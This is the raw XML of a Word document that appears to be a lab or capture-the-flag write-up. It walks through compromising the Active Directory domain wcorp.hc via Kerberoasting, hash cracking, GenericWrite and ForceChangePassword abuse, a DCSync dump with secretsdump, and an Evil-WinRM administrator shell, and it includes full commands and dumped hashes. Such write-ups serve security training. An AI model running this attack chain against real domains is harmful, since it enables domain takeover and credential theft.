          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SPN </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was requested, enabling the execution of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attack.</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GetUserSPNs.py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wcorp.hc/svc_backup:'PASSWORD_HERE'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Impacket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v0.13.0.dev0+20250320.94448.5a402fcb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Fortra,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ServicePrincipalName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PasswordLastSet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LastLogon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HTTP/app01.wcorp.hc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03:55:21.770126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18:20:46.842080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CCache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Skipping...</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5tgs$23$*svc_web$WCORP.HC$wcorp.hc/svc_web*$928e2188409c8fe6d3ef600530ab7ed9$ddb374b7a431707fe635d505e0f68498cc9649b6bb593a152aec88024c3b4926050ce9f0f1d918657c35ebe3bc47328cd84c6e8a09d114cfeab136fd26ad1cc7bc316ed8c9008085b459c0365eea925c9072bb2189fdf0bb22dce56cad165dedeef936493dbb73f2f878ae4df1e09f4313d41d476e8faffdfae361d328b57ed2b533e135906c13e4c9a3e46525c1233451653e6c3ad13b975afbe52cfb4b73d93d153342b453e432722492e086ff214503a3...</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a5yqeh68l4ow" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a8lqmjmwaael" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.xz9j91on8e8y" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.bsjniliyuvew" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of the parameters:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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wcorp.hc/svc_backup:'PASSOWRD_HERE'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authentication credentials, with domain (wcorp.hc), user (svc_backup), and password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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dc-ip 172.16.11.181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IP of the Domain Controller to be queried.</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request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in addition to listing the SPNs, it also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requests the TGS (Ticket Granting Service)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for the found users, returning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Kerberos hash</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that can be used in Kerberoasting attacks.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With the Kerberos hash obtained from the svc_web service account, a file was created containing the captured value, which was then used in a brute-force attack to recover the plaintext password.</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-w=/usr/share/wordlists/rockyou.txt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hash-svc-web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--format=krb5tgs</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(krb5tgs,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Kerberos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HMAC-MD5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RC4])</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0.06489g/s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718261p/s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718261c/s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718261C/s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J,milagros..IwonDarlaCarlo</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reliably</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0F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another valid credential, a new </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">analysis was performed to verify the permissions and relationships assigned to this user within the domain, aiming to identify possible privilege escalation paths.</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2628900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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ind w:left="0" w:right="60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It was identified that the compromised account has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GenericWrite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permission over the user john.doe.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This permission allows the modification of certain attributes of the object in Active Directory, which can be exploited to obtain the user's Kerberos hash.</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60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GenericWrite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permission allows changing several attributes of an object in Active Directory, such as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servicePrincipalName, userAccountControl, scriptPath,</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among others.</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~/tools/targetedKerberoast/targetedKerberoast.py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kerberoast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attacks</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LDAP</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[VERBOSE]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(john.doe)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(john.doe)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5tgs$23$*john.doe$WCORP.HC$wcorp.hc/john.doe*$939e53611c683c816214a9c0ad74eaf8$f1c85db1878f06e69660b879924782d94545b6a3207d0ad314a92290946d073d61e40546a017ead54741a52eb3f67d7f08e14ad09a6e5f10f5db913065679da3a30bb958936f12552334d7dda243c659c095cf41b170f192f00bde4bfadb42e7db3bbbff1c98ecd86d7c1adbc0aab9eca53262883c8ad2c9ea52c79187a7aa32f4634c234184090005c22a6ffea8822280453753a657f288e5d71128385041973c7c9bff1fe3c1e924556148f7692d4e7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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9vd19load92f" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.of6uqmtzvt8k" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of the parameters:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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enables verbose mode, displaying additional execution details (e.g., added/removed SPNs and extracted hashes).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 'wcorp.hc'</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specifies the target domain name.</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-u 'svc_web'</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username that has permissions over the target object (e.g., GenericWrite over another user).</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-p 'PASSWORD_HERE'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password for the user supplied in -u.</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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="singl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Reference link:</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">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hyperlink>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://github.com/ShutdownRepo/targetedKerberoast</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After executing the command, it was possible to obtain the Kerberos hash for the user john.doe.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With this, a new file containing the extracted hash was created, which was used in a brute-force attack with the aim of recovering the plain-text password.</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-w=/opt/SecLists/Passwords/xato-net-10-million-passwords.txt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--format=krb5tgs</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(krb5tgs,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Kerberos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HMAC-MD5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RC4])</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0.3205g/s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1138Kp/s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1138Kc/s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1138KC/s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Wf46NuLv..WeiLu3</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reliably</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12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As soon as we executed the brute-force attack on the user's hash, it was possible to identify their password in plain text.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With the valid credentials in hand, a new analysis was performed on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BloodHound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to verify the permissions and relationships assigned to this user in the domain.</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943600" cy="2768600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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768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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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It was identified that the user john.doe has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ForceChangePassword</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privilege over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diana.ops</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account, allowing the password to be changed without the need for the current credential.</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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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ForceChangePassword</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permission allows a user to change the password of another object in Active Directory without needing to know the current password.</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This permission can be exploited to take control of accounts, enabling lateral movement or privilege escalation within the domain.</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Based on the information collected, it was possible to use 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net</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_</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rpc</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tool to change the password of the target account, exploiting the previously identified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ForceChangePassword</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permission.</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"diana.ops"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"newP@ssword2025"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"wcorp.dc"/"john.doe"%"PASSOWRD_HERE"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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">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heading=h.64ow41xw2ak1" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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heading=h.nq53zup3j8wp" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>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heading=h.3tsbe3y4jg5q" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ureiwh5ek18l" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of the parameters:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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password "diana.ops" "newP@ssword2025"</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sets the new password newP@ssword2025 for the user diana.ops.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U "wcorp.dc"/"john.doe"%"Welcome01\!"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specifies the credentials used for authentication: domain wcorp.dc, user john.doe, and password Welcome01!.</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 "172.16.11.181"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IP address of the server (Domain Controller) where the command will be executed.</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After changing the password for the user diana.ops, we can perform the validation using netexec again.</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diana.ops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'newP@ssword2025'</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(domain:wcorp.hc)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(signing:True)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(SMBv1:False)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wcorp.hc\diana.ops:newP@ssword2025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the confirmation of the password change, it was possible to explore the DCSync permission assigned to the account, allowing the extraction of all domain user hashes through replication via the MS-DRSR protocol.</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secretsdump.py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wcorp.hc/diana.ops:'newP@ssword2025'@172.16.11.181</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Impacket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v0.13.0.dev0+20250320.94448.5a402fcb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Fortra,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RemoteOperations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DCERPC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0x5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rpc_s_access_denied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Dumping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(domain\uid:rid:lmhash:nthash)</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DRSUAPI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NTDS.DIT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Administrator:500:aad3b435b51404...:bca93a964...:::</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Guest:501:aad3b435...:31d6cfe0d16ae931b...:::</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krbtgt:502:aad3b435b51404eeaa...:cc714fd2703f917a...:::</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wcorp.hc\john.doe:1103:aad3b435b51404eeaad3...:a59cc2e81b2835c6b402...:::</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wcorp.hc\alice.hr:1104:aad3b435b51404eeaa...:e4a22d8e7bbec871b341...:::</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wcorp.hc\bob.finance:1105:aad3b435b51404eeaad3b43...:e4a22d8e7bbec871b3...:::</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wcorp.hc\charlie.dev:1106:aad3b435b51404eeaad...:e4a22d8e7bbec871b341...:::</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wcorp.hc\diana.ops:1107:aad3b435b51404eea...:7e65f5b65d10011a6fed...:::</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wcorp.hc\svc_backup:1108:aad3b435b51404ee...:22221aa9489a9fa9996434...:::</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wcorp.hc\svc_web:1109:aad3b435b51404eeaad3b...:232a3f9ae310b3947...:::</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DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:12cf1d639f3f592bd106a7a4a1dc5c50:::</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Kerberos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grabbed</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Administrator:aes256-cts-hmac-sha1-96:8ee821d1e116cb434d8....</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Administrator:aes128-cts-hmac-sha1-96:2adc5...</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Administrator:des-cbc-md5:02a8fda77fa7f...</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krbtgt:aes256-cts-hmac-sha1-96:f022ee99f8b87e4be388ad41...</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krbtgt:aes128-cts-hmac-sha1-96:6018625e53c5d42d8...</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krbtgt:des-cbc-md5:08a11cf83e07...</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wcorp.hc\john.doe:aes256-cts-hmac-sha1-96:e7aeb26e...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wcorp.hc\john.doe:aes128-cts-hmac-sha1-96:dd9be64bbac17e....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wcorp.hc\john.doe:des-cbc-md5:0110bce6...</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wcorp.hc\alice.hr:aes256-cts-hmac-sha1-96:f3a70e105d4de1799751...</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wcorp.hc\alice.hr:aes128-cts-hmac-sha1-96:8a635d4b56fc7e34...</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wcorp.hc\alice.hr:des-cbc-md5:b0abda1ad0...</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wcorp.hc\bob.finance:aes256-cts-hmac-sha1-96:011cb74370b529...</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wcorp.hc\bob.finance:aes128-cts-hmac-sha1-96:020dd777e41c92a...</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wcorp.hc\bob.finance:des-cbc-md5:d60498679...</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wcorp.hc\charlie.dev:aes256-cts-hmac-sha1-96:f765886fdfce6....</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wcorp.hc\charlie.dev:aes128-cts-hmac-sha1-96:280d6d018....</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wcorp.hc\charlie.dev:des-cbc-md5:40d949e3e....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wcorp.hc\diana.ops:aes256-cts-hmac-sha1-96:b2159459dee8f808316...</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wcorp.hc\diana.ops:aes128-cts-hmac-sha1-96:ed9cb5260e2...</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wcorp.hc\diana.ops:des-cbc-md5:a22502750e3...</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wcorp.hc\svc_backup:aes256-cts-hmac-sha1-96:8d3fe9d6e96d1430d0b1...</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wcorp.hc\svc_backup:aes128-cts-hmac-sha1-96:5da051c6ebbc951d1...</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wcorp.hc\svc_backup:des-cbc-md5:6254046b6...</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wcorp.hc\svc_web:aes256-cts-hmac-sha1-96:bf9c31ef9b07082d968...</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wcorp.hc\svc_web:aes128-cts-hmac-sha1-96:55e0dfb6d8559e...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wcorp.hc\svc_web:des-cbc-md5:6e76ea0e....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DC-01$:aes256-cts-hmac-sha1-96:448eb11c780a8fed6835a239185f9...</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DC-01$:aes128-cts-hmac-sha1-96:961e5ee206a35b4b....</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DC-01$:des-cbc-md5:764ca8ea0b...</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0" w:lineRule="auto"/>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The DCSync permission allows a user to simulate the behavior of a Domain Controller and request the replication of Active Directory data, including password hashes for all domain accounts.</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This permission is highly sensitive and, if misused, can result in the complete compromise of the environment.</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With all domain hashes extracted, it was possible to recover the password for the Administrator user.</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Using these valid credentials, an interactive session was established via the WinRM service, previously identified during the port and service enumeration phase.</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evil-winrm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172.16.11.181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bca93a...</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Evil-WinRM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v3.5</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disabled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quoting_detection_proc()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unimplemented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machine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Evil-WinRM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https://github.com/Hackplayers/evil-winrm#Remote-path-completion</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endpoint</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*Evil-WinRM*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C:\Users\Administrator\Documents&gt;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whoami</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wcorp\administrator</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*Evil-WinRM*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C:\Users\Administrator\Documents&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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With administrative privileges, we can view our last evidence within the Administrator user's Desktop directory.</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5943600" cy="2057400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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057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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>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85">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wobkcnckavu8"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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="13"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86">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87">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842519685038pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="12"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11"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WCorp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1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6667500" cy="300187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stringuetta/enumport" TargetMode="Externa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267" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fstringuetta/enumport" TargetMode="External"/><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hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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9aS22DDfh6PdxgsrpvoU0FjDQ==">CgMxLjAyDmguNG5vZzM4d2owZXJhMg5oLnFpZHl1MWJhZ2N2dzIOaC55cjYxcDRsMmM0cDIyDmguYXpiOWlweXc5am5hMg5oLmRjMGR3YWM3anRqdjIOaC56M3RlcmFjdnBlejEyDmgudzk2eXdxamI3OGdqMg5oLjNvMzM2cDU4amwzcjIOaC4xc2g2Zm9vNmRxY3QyDmguYTV5cWVoNjhsNG93Mg5oLmE4bHFtam13YWFlbDIOaC54ejlqOTFvbjhlOHkyDmguYnNqbmlsaXl1dmV3Mg5oLjl2ZDE5bG9hZDkyZjIOaC5vZjZ1cW10enZ0OGsyDmguNjRvdzQxeHcyYWsxMg5oLm5xNTN6dXAzajh3cDIOaC4zdHNiZTN5NGpnNXEyDmgudXJlaXdoNWVrMThsMg5oLndvYmtjbmNrYXZ1ODgAciExaXpPYUZ2SUNVRFo0VGNzSTNmWWJBRVJTNWVTTEl0Z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